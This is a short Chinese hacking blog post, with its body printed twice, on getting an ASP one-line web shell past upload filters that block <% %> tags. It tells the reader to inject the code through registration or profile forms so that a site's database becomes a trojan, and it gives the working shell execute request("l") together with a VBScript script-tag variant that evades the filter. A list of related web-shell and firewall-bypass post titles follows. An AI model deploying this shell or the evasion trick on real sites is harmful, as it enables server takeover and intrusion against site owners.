一句话木马中突破〈%%〉标记过滤
2008-08-31 12:37
330 查看
突破〈%%〉标记过滤
很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码,使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。
这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。
原来的程序代码是“〈%execute request("l")%>", 我们可以把它的标签换下来,改成"<scriptlanguage=VBScript runat=server>execute request("l")</Script>".这样就避开了使用〈%%〉,保存为.ASP,程序照样执行。效果是一样的
很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码,使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。
这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。
原来的程序代码是“〈%execute request("l")%>", 我们可以把它的标签换下来,改成"<scriptlanguage=VBScript runat=server>execute request("l")</Script>".这样就避开了使用〈%%〉,保存为.ASP,程序照样执行。效果是一样的
相关文章推荐
- 一句话木马中突破〈%%〉标记过滤
- unicode变形一句话突破web防火墙过滤
- unicode变形一句话突破web防火墙过滤
- (新方法)图片一句话木马(免杀)
- ScriptHtml 函数之过滤html标记的asp代码
- hackermi PHP 404 一句话木马
- 过滤标记
- 一句话木马插入图片----edjpgcom
- Android中过滤Json数据中的html标记
- 通过mysql 插入一句话木马
- 中国菜刀与一句话木马
- (转)再谈突破TCP-IP过滤/防火墙进入内网(icmp篇)
- 可突破安全狗的aspx一句话
- c#正则过滤html标记
- 黑客突破TCP-IP过滤/防火墙进入内网(2)
- 一句话木马集合
- 经典的 Aspx一句话木马使用
- php过滤html标记属性类用法实例
- mysql 一句话木马
- 黑客突破TCP-IP过滤/防火墙进入内网